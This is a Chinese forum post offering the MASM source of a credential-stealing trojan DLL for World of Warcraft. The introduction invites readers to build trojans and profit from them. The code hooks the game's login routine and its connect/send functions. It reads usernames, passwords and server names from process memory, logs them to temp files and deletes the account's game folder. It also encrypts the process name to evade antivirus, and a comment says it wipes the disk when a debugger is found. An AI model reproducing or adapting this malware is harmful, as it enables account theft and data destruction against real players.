美服，欧服WOW木马核心源代码，游戏版本v2.4.3.8606 's

文章作者：asm （MSN：[email protected]）
信息来源：邪恶八进制

对应游戏版本v2.4.3.8606。这个只是核心代码，而非完整代码，通过调式完全可以写出美服跟欧服的WOW马来，大家发财去吧

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; ;                 Programmed by asm, MSN:[email protected]                         ; ;                  WOWGameMaker For WOW_MF_OF                                   ; ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; ;0041DAEA  |.  5E            pop     esi                <-------------特征码位置+12=断点位置 ;0041DAEB  |.  33CD          xor     ecx, ebp ;0041DAED  |.  5B            pop     ebx ;0041DAEE  |.  E8 E7CAFEFF   call    0040A5DA ;0041DAF3  |.  8BE5          mov     esp, ebp ;0041DAF5  |.  5D            pop     ebp                <-------------断点位置 ;0041DAF6  /.  C2 0400       retn    4                  <-------------ret执行后，游戏会跳转到005B55B4h这里执行。因此在木马里要 ;搜索这个地址得特征码从而得到通用得地址，而不是直接采用硬编码 = =。再得到通用得地址后执行 mov eax,hJmpEip/jmp eax即可  ;szUserPassRealCode db 5Eh, 33h, 0CDh,5Bh, 0E8h, 0E7h,0CAh,0FEh,0FFh,8Bh,0E5h,5Dh,0C2h, 04h,00h  ;005B55B4      8B4D FC       mov     ecx, dword ptr [ebp-4]    <-----------------得到要跳转的地址 ;005B55B7      5F            pop     edi ;005B55B8      5E            pop     esi ;005B55B9  |.  33CD          xor     ecx, ebp ;005B55BB  |.  5B            pop     ebx ;005B55BC  |.  E8 1950E5FF   call    0040A5DA ;005B55C1      8BE5          mov     esp, ebp  ;szJmpEip db 8Bh,4Dh, 0FCh,5Fh,5Eh,33h,0CDh,5Bh,0E8h, 19h,50h,0E5h,0FFh,8Bh,0E5h ;---------------------------------------------------------------------------------------------------------------- .486 .model flat,stdcall option casemap:none include debug.inc include        windows.inc include        user32.inc includelib        user32.lib include        kernel32.inc includelib        kernel32.lib include        advapi32.inc includelib        advapi32.lib include        comctl32.inc includelib        comctl32.lib include        psapi.inc includelib        psapi.lib IncludeLib Masm32.lib Include Masm32.inc include     Shlwapi.inc includelib  Shlwapi.lib include     shell32.inc includelib  shell32.lib include macros.inc includelib mylib.lib include        wininet.inc includelib    wininet.lib HOOKAPI struct a  byte 0B8h PMyapi DWORD 0 d BYTE 0FFh e BYTE 0E0h HOOKAPI ends  MODULEINFO struct  lpBaseOfDll dword 0 SizeOfImage dword 0 EntryPoint dword 0  MODULEINFO ends F_STOP                equ        0002h  ;子程序声明  HookApi proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD HookApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD HookApiRecv proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD WriteApi proto :DWORD ,:DWORD,:DWORD,:DWORD WriteApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD MyHookFunToGetUserAndPass proto  :DWORD  ,:DWORD,:DWORD MyConnect  proto  :DWORD  ,:DWORD,:DWORD;,:DWORD MyRecv proto  :DWORD  ,:DWORD,:DWORD,:DWORD GetApi proto  :DWORD,:DWORD BakDll proto  :DWORD,:DWORD  AntiFileToRun proto c :DWORD BytePos proto c :DWORD,:DWORD,:DWORD,:DWORD,:DWORD LoadModuleEx proto c :DWORD GetModuleImageSize proto c :DWORD CaleHookPointerWOW proto c ExtractFileName proto c :DWORD ExtractFilePath proto c :DWORD  ;已初始化数据 .data hInstance dd 0 WProcess dd 0  Papi1 DWORD ? Papi2 DWORD ? Papi3 DWORD ? WritBak1 HOOKAPI <> WritBak2 HOOKAPI <> ApiBak1 db 10 dup(?) ApiBak2 db 10 dup(?) DllName1  db "ws2_32.dll",0 ApiName1  db "connect",0 ApiName2  db "recv",0 ApiName3 db "hook",0 szWowprocess db "g&mpm",0   ;wow.exe加密 Dllbase1 DWORD ? NowDllbase1 DWORD ? NowDllbase2 DWORD ? dwTemp dd ? hAdress dd ? ;Dllbase2 DWORD ? ;NowDllbase2 DWORD ? hRecvBak dd ? hRecv dd ? szJmp db  0C2h,04h,00h,0cch,0cch,0cch,0cch   ;恢复 szJmpRecv db  8Bh,0FFh,55h,8Bh,0ECh,83h,0ECh, 10h,53h,33h,0DBh,81h,3Dh, 28h,40h,0A3h,71h,56h,0Fh,84h, 5Eh,50h,00h,00h szWOWFmt db "wowu=%s&wowp=%s&wowf=%s",13,10,13,10,0 szUserPassRealCode db 5Eh, 33h, 0CDh,5Bh, 0E8h, 0E7h,0CAh,0FEh,0FFh,8Bh,0E5h,5Dh,0C2h, 04h,00h szJmpEip db 8Bh,4Dh, 0FCh,5Fh,5Eh,33h,0CDh,5Bh,0E8h, 19h,50h,0E5h,0FFh,8Bh,0E5h szEbpEnter db 6Ah, 40h, 5Ah,01h,5Ch,0FAh, 12h,00h,0C7h, 16h,42h .data?  hHook dd ? hHook1 dd ? hPid dd ? ;hHwnd dd ? WOWuser db 50 dup(?) WOWpwd db 50 dup(?) WOWpwd1 db 50 dup(?) WOWpwd2 db 50 dup(?) szText db 256 dup(?) szText1 db 256 dup(?) @szValue db 256 dup(?) szServer db 256 dup(?) szUserJiaoSe db 256 dup(?) ;程序代码段 hQQ dd ? hWnd dd ? QQpid dd ?  hecx dd ? hedx dd ? hesp dd ? hebp dd ? hesi dd ? hebx dd ? hedi dd ? szWoWBak db 256 dup(?) szWoWBak1 db 256 dup(?) ThreadId6 DWORD ? szLevel db 20 dup(?) szFileName db 200 dup(?) szSendData db 256 dup(?) TempPath db 256 dup(?) hWnd1 dd ? hEnter dd ? hExeModule dd ? dwModuleSize dd ? hUserPassRealCode dd ? hICout dd ? hJmpEip dd ? WOWServer  db 256 dup(?) szFu db 125 dup(?) stStartUp        STARTUPINFO                <> stProcInfo        PROCESS_INFORMATION        <> @dwSize dd ? szFind WIN32_FIND_DATA<?> szSend1 db 256 dup(?) szSend2 db 256 dup(?) hRecv1 DD ? hAddress dd ? szPlayerName db 260 dup (?) szPlayerName1 db 260 dup (?) hRecv2 dd ? hRecv3 dd ? hSend dd ? szBakSend db 20 dup(?) dwFolderCount dd ? dwOption dd ? .code include inNTSAPISHELL.asm ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;每次启动都要把目录先跟文件先清空。这样可以保证获取的等级是对应游戏账号得。 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _FindFileToDel        proc        _lpszPath local        @stFindFile:WIN32_FIND_DATA local        @hFindFile local        @szPath[MAX_PATH]:byte                ;用来存放“路径/” local        @szSearch[MAX_PATH]:byte        ;用来存放“路径/*.*” local        @szFindFile[MAX_PATH]:byte        ;用来存放“路径/找到的文件”  pushad invoke        lstrcpy,addr @szPath,_lpszPath ;******************************************************************** ; 在路径后面加上/*.* ;******************************************************************** @@: invoke        lstrlen,addr @szPath lea        esi,@szPath add        esi,eax xor        eax,eax mov        al,'/' .if        byte ptr [esi-1] != al mov        word ptr [esi],ax .endif invoke        lstrcpy,addr @szSearch,addr @szPath invoke        lstrcat,addr @szSearch,CTXT("*.*") ;******************************************************************** ; 寻找文件 ;******************************************************************** invoke        FindFirstFile,addr @szSearch,addr @stFindFile .if        eax !=        INVALID_HANDLE_VALUE mov        @hFindFile,eax .repeat invoke        lstrcpy,addr @szFindFile,addr @szPath invoke        lstrcat,addr @szFindFile,addr @stFindFile.cFileName .if        @stFindFile.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY .if        @stFindFile.cFileName != '.' inc        dwFolderCount invoke        _FindFileToDel,addr @szFindFile ;继续找，从最后一个目录删除才可以。顺序不能调换 invoke RemoveDirectory,addr @szFindFile .endif .else invoke        DeleteFile,addr @szFindFile ;是文件就删除 .endif invoke        FindNextFile,@hFindFile,addr @stFindFile .until        (eax ==        FALSE) || (dwOption & F_STOP) invoke        FindClose,@hFindFile .endif popad ret  _FindFileToDel        endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;权限提升 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _EnablePrivilege proc szPriv:DWORD, bFlags:DWORD LOCAL      hToken LOCAL       tkp : TOKEN_PRIVILEGES  invoke     GetCurrentProcess mov       edx, eax invoke     OpenProcessToken, edx, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, addr hToken invoke     LookupPrivilegeValue, NULL, szPriv, addr tkp.Privileges.Luid mov      tkp.PrivilegeCount, 1 xor       eax, eax  .if     bFlags mov    eax, SE_PRIVILEGE_ENABLED .endif  mov       tkp.Privileges.Attributes, eax invoke     AdjustTokenPrivileges, hToken, FALSE, addr tkp, 0, 0, 0 push       eax invoke     CloseHandle, hToken pop       eax  ret _EnablePrivilege endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> _WriteFile proc _lpbuff:DWORD,lpfilepath:DWORD local @dwWritebyte1:DWORD local @hFiledaka,@dwWritedaka pushad invoke        CreateFile,lpfilepath,GENERIC_WRITE or GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,/ 0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 mov        @hFiledaka,eax invoke        SetFilePointer,@hFiledaka,0,NULL,FILE_END invoke        lstrlen,_lpbuff mov        @dwWritedaka,eax invoke  WriteFile,@hFiledaka,_lpbuff,@dwWritedaka,addr @dwWritebyte1,NULL invoke        CloseHandle,@hFiledaka popad ret _WriteFile endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ;DLL入口点 DllEntry proc hInst:HINSTANCE, reason:DWORD, reserved1:DWORD  .if reason==DLL_PROCESS_ATTACH     ;当DLL加载时产生此事件 push hInst pop hInstance invoke RtlZeroMemory,addr szText,256 invoke GetModuleFileName,NULL,addr szText,256 invoke ExtractFileName,addr szText invoke wsprintf,addr szFileName,CTXT("%s"),eax invoke EncryptString,addr szWowprocess ;解密wow.exe过麦咖啡 invoke CompareString,LOCALE_USER_DEFAULT, NORM_IGNORECASE,addr szFileName, -1,addr szWowprocess, -1;如果是wow，则hook .if eax == 2 invoke OutputDebugString,CTXT("found....") invoke LoadModuleEx,NULL mov hExeModule,eax invoke GetModuleImageSize,hExeModule mov dwModuleSize,eax invoke BytePos,hExeModule, dwModuleSize,addr szUserPassRealCode,sizeof szUserPassRealCode,hICout ;搜索特征码的位置 .if eax == -1 invoke OutputDebugString,CTXT("search error") .endif mov hUserPassRealCode,eax mov eax,hExeModule add hUserPassRealCode,eax ;特征码的位置 add hUserPassRealCode,12  ;得到实际断点位置 invoke BytePos,hExeModule, dwModuleSize,addr szJmpEip,sizeof szJmpEip,hICout ;要跳转的位置。 .if eax == -1 invoke OutputDebugString,CTXT("jmp eip code search error") .endif mov hJmpEip,eax mov eax,hExeModule add hJmpEip,eax invoke   GetCurrentProcess                                   ;取进程伪句柄 mov WProcess ,eax invoke BakDll,addr DllName1,addr Dllbase1        ;备份"kernel32.dll" mov NowDllbase1,eax invoke HookApi1,addr DllName1,addr ApiName3,addr Papi1,addr MyHookFunToGetUserAndPass,addr ApiBak1,addr WritBak1   ;HOOK 0041DAEE 这个地址得到用户跟密码 invoke HookApi,addr DllName1,addr ApiName1,addr Papi2,addr MyConnect,addr ApiBak2,addr WritBak2   ;HOOK connect ;invoke HookApiRecv,addr DllName1,addr ApiName2,addr Papi3,addr MyRecv,addr ApiBak2,addr WritBak2   ;HOOK recv invoke GetApi,addr DllName1,CTXT("send") ;得到send函数地址 mov hSend,eax invoke ReadProcessMemory,WProcess,hSend,addr szBakSend,20,NULL  ;备份send函数20字节 call kernel32_IsDebuggerPresent ;反调式。如果发现dll被调式，则摧毁硬盘。 invoke CreateThread,NULL,0,addr _Anti,NULL,0,addr ThreadId invoke CreateThread,NULL,0,addr _GetWowGameLevel,NULL,0,addr ThreadId1 .endif .endif .if  reason==DLL_PROCESS_DETACH ;当卸载的时候 .endif mov  eax,TRUE ret DllEntry Endp  ;**************************************************************** GetMsgProc proc nCode:DWORD,wParam:DWORD,lParam:DWORD invoke CallNextHookEx,hHook,nCode,wParam,lParam mov eax,TRUE  ret GetMsgProc endp ;--------------------------------------------------------------------- InstallHook proc dwProcessId:dword push dwProcessId pop hPid ;invoke SetWindowsHookEx,WH_GETMESSAGE,addr GetMsgProc,hInstance,NULL mov hHook,eax ret InstallHook endp  UninstallHook proc  invoke UnhookWindowsHookEx,hHook push eax  invoke WriteApi,WProcess,Papi1, addr ApiBak1 ,8               ;还原API  pop eax ret UninstallHook endp ;***************************************************************** GetApi proc DllNameAddress:DWORD,ApiNameAddress:DWORD  invoke  GetModuleHandle,DllNameAddress     ;取DLL模块句柄  .if eax==NULL  invoke LoadLibrary ,DllNameAddress    ;加载DLL .endif  invoke GetProcAddress,eax,ApiNameAddress  ;取API地址 mov hAdress,eax mov eax,hAdress ret GetApi endp  ;*********************************下面是核心部分***************** HookApiRecv proc DllName:dword,ApiName:dword ,Papi:dword , MyApi:dword ,ApiBak:dword ,WritBak:dword  LOCAL ApiDz  invoke GetApi,DllName,ApiName                  ;取API地址  .if eax==0  ret  .endif mov hAdress,eax invoke lstrcmp,ApiName,CTXT("recv");如果是recv，则hook的地址是 recv的地址。 .if eax == NULL ;connect ? push hAdress pop ApiDz               ;下面几行是保存API地址 invoke wsprintf,addr szText,CTXT("Recv address：0x%x"),ApiDz invoke OutputDebugString,addr szText .endif mov eax,Papi assume eax:ptr push ApiDz pop [eax]  invoke ReadProcessMemory,WProcess,ApiDz,ApiBak,8,NULL  ;备份原API的前8字节  .if eax==0  ret  .endif  mov eax,WritBak  assume eax:ptr HOOKAPI  push MyApi  pop  [eax].PMyapi                 ;要替代API的函数地址  .if [eax].PMyapi == 0  mov eax,0  ret  .endif  invoke WriteApi,WProcess,ApiDz,  WritBak ,size HOOKAPI    ;HOOK API  ret  HookApiRecv endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HookApi proc DllName:dword,ApiName:dword ,Papi:dword , MyApi:dword ,ApiBak:dword ,WritBak:dword  LOCAL ApiDz  invoke GetApi,DllName,ApiName                  ;取API地址  .if eax==0  ret  .endif mov hAdress,eax invoke lstrcmp,ApiName,CTXT("connect") .if eax == NULL ;connect ? push hAdress pop ApiDz               ;下面几行是保存API地址 invoke wsprintf,addr szText,CTXT("connect address：0x%x"),ApiDz invoke OutputDebugString,addr szText .endif  mov eax,Papi assume eax:ptr push ApiDz pop [eax]  invoke ReadProcessMemory,WProcess,ApiDz,ApiBak,8,NULL  ;备份原API的前8字节  .if eax==0  ret  .endif  mov eax,WritBak  assume eax:ptr HOOKAPI  push MyApi  pop  [eax].PMyapi                 ;要替代API的函数地址  .if [eax].PMyapi == 0  mov eax,0  ret  .endif  invoke WriteApi,WProcess,ApiDz,  WritBak ,size HOOKAPI    ;HOOK API  ret  HookApi endp ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HookApi1 proc DllName:dword,ApiName:dword ,Papi:dword , MyApi:dword ,ApiBak:dword ,WritBak:dword  LOCAL ApiDz  invoke lstrcmp,ApiName,CTXT("hook") .if eax == NULL mov eax,hUserPassRealCode mov ApiDz,eax .endif invoke wsprintf,addr szText,CTXT("myhook address：0x%x"),ApiDz invoke OutputDebugString,addr szText  mov eax,Papi assume eax:ptr push ApiDz pop [eax] invoke ReadProcessMemory,WProcess,ApiDz,ApiBak,8,NULL  ;备份原API的前8字节 .if eax==0 ret .endif mov eax,WritBak assume eax:ptr HOOKAPI push MyApi pop  [eax].PMyapi                 ;要替代API的函数地址 .if [eax].PMyapi == 0 mov eax,0 ret .endif  invoke WriteApi,WProcess,ApiDz,  WritBak ,size HOOKAPI    ;HOOK API ret HookApi1 endp ;------------------------------------------------------------------ ;WriteApi修改内存 ;------------------------------------------------------------------ WriteApi proc Process:DWORD ,Papi:DWORD,Ptype:DWORD,Psize:DWORD  LOCAL mbi:MEMORY_BASIC_INFORMATION LOCAL msize:DWORD  ;返回页面虚拟信息 invoke VirtualQueryEx,Process, Papi,addr mbi,SIZEOF MEMORY_BASIC_INFORMATION ;修改为可读写模式 invoke VirtualProtectEx,Process, mbi.BaseAddress,8h,PAGE_EXECUTE_READWRITE,addr mbi.Protect ;开始写内存 invoke  WriteProcessMemory,Process, Papi, Ptype,Psize ,NULL PUSH eax ;改回只读模式 invoke VirtualProtectEx,Process,mbi.BaseAddress,8h,PAGE_EXECUTE_READ,addr mbi.Protect pop eax ret  WriteApi endp ;------------------------------------------------------------------ ;hook掉Connect函数 ;------------------------------------------------------------------ MyRecv proc dwDesiredAccess:DWORD  ,bInheritHandle:DWORD  ,dwProcessId:DWORD, Flg:DWORD LOCAL  NowApiBase mov eax,Papi3 ;hook新函数，这里要声明 sub eax,Dllbase1 add eax,NowDllbase1 mov NowApiBase,eax  push Flg push dwProcessId push bInheritHandle push dwDesiredAccess call NowApiBase ret MyRecv endp ;******************************************************************* MyConnect proc dwDesiredAccess:DWORD  ,bInheritHandle:DWORD  ,dwProcessId:DWORD;, Flg:DWORD LOCAL  NowApiBase mov eax,Papi2 sub eax,Dllbase1 add eax,NowDllbase1 mov NowApiBase,eax  INVOKE RtlZeroMemory,ADDR szText1,SIZEOF szText1 INVOKE wsprintf,addr szText1,CTXT("connect inCunt:%d"),hRecv invoke OutputDebugString,addr szText1 .if hRecv1 == 1  ;断connect函数是为了防止第一次输入错误密码再次输入的时候截不到的问题。再次调用connect的时候，就说明再次输入密码，因此要再次hook。也就是错误密码不被写入 invoke HookApi1,addr DllName1,addr ApiName3,addr Papi1,addr MyHookFunToGetUserAndPass,addr ApiBak1,addr WritBak1   ;HOOK 0041DAEE 这个地址得到用户跟密码 mov hRecv1,0 .endif push dwProcessId push bInheritHandle push dwDesiredAccess call NowApiBase ret MyConnect endp ;------------------------------------------------------------------ ;获取密码函数 ;------------------------------------------------------------------ ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; ;                 Programmed by asm, MSN:[email protected]                               ; ;                  WOWGameMaker For WOW_MF_OF                                   ; ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>; MyHookFunToGetUserAndPass proc dwDesiredAccess:DWORD  ,bInheritHandle:DWORD  ,dwProcessId:DWORD local NowApiBase local @dwSize1 LOCAL finddata:WIN32_FIND_DATA LOCAL finddata1:WIN32_FIND_DATA local hFindFile,hFindFile1  invoke RtlZeroMemory,addr WOWpwd,sizeof WOWpwd invoke    ReadProcessMemory,WProcess,ebx,addr WOWpwd,sizeof WOWpwd,NULL invoke RtlZeroMemory,addr WOWuser,sizeof WOWuser invoke    ReadProcessMemory,WProcess,edi,addr WOWuser,sizeof WOWuser,NULL invoke    ReadProcessMemory,WProcess,0088F9C8h,addr WOWServer,sizeof WOWServer,NULL invoke RtlZeroMemory,addr TempPath,256 invoke GetTempPath,256,addr TempPath invoke lstrcat,addr TempPath,CTXT("fmt.log") invoke DeleteFile,addr TempPath invoke RtlZeroMemory,addr szSendData,256 invoke wsprintf,addr szSendData,addr szWOWFmt,addr WOWuser,addr WOWpwd,addr WOWServer invoke _WriteFile,addr szSendData,addr TempPath invoke RtlZeroMemory,addr TempPath,256 invoke GetTempPath,256,addr TempPath invoke lstrcat,addr TempPath,CTXT("fmttemp.log") invoke DeleteFile,addr TempPath invoke _WriteFile,addr WOWuser,addr TempPath mov        @dwSize,sizeof @szValue invoke        _RegQueryValue,CTXT("SOFTWARE/Blizzard Entertainment/World of Warcraft"),CTXT("InstallPath"),addr @szValue,addr @dwSize,CTXT("REG_SZ") ;得到WOW安装路径 invoke lstrcat,addr @szValue,CTXT("WTF/Account/") invoke lstrcat,addr @szValue,addr WOWuser invoke _FindFileToDel,addr @szValue ;清空当前用户下的所有文件跟子目录 invoke        WriteProcessMemory,WProcess,hUserPassRealCode,addr szJmp,7,addr dwTemp MOV hRecv1,1 invoke WriteProcessMemory,WProcess,hSend,addr szBakSend,20,NULL  ;恢复send函数20字节 add ebp,5ch mov eax,hJmpEip jmp eax ret MyHookFunToGetUserAndPass endp  ;------------------------------------------------------------------ ;备份dll函数 ;------------------------------------------------------------------ BakDll proc  DllName:DWORD,Dllbase:DWORD LOCAL ModuleHwnd,hMainHeap,lpBuffer LOCAL ModuleInformation: MODULEINFO  invoke GetModuleHandle,DllName mov ModuleHwnd,eax .if  ModuleHwnd==0 ret .endif invoke GetModuleInformation,WProcess,ModuleHwnd,addr ModuleInformation,size MODULEINFO .if   eax ==0 jmp   UninstallHook ret .endif ;原DLL的基地址 mov eax,Dllbase assume eax:ptr push ModuleInformation.lpBaseOfDll pop [eax] invoke VirtualAlloc, 0,ModuleInformation.SizeOfImage,4096,PAGE_EXECUTE_READWRITE mov lpBuffer,eax .if lpBuffer==0 jmp   UninstallHook ret .endif ;备份DLL invoke  WriteProcessMemory,WProcess,lpBuffer, ModuleInformation.lpBaseOfDll,ModuleInformation.SizeOfImage,0 .if eax==0 jmp   UninstallHook ret .endif mov eax,lpBuffer ret BakDll endp ;******************************************************************* End DllEntry